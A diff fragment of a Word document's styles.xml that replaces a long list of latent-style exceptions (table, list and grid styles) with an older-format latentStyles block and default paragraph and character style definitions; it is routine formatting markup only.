-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+  </w:latentStyles>
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+    <w:name w:val="Normal"/>
+    <w:qFormat/>
+  </w:style>
+  <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
+    <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
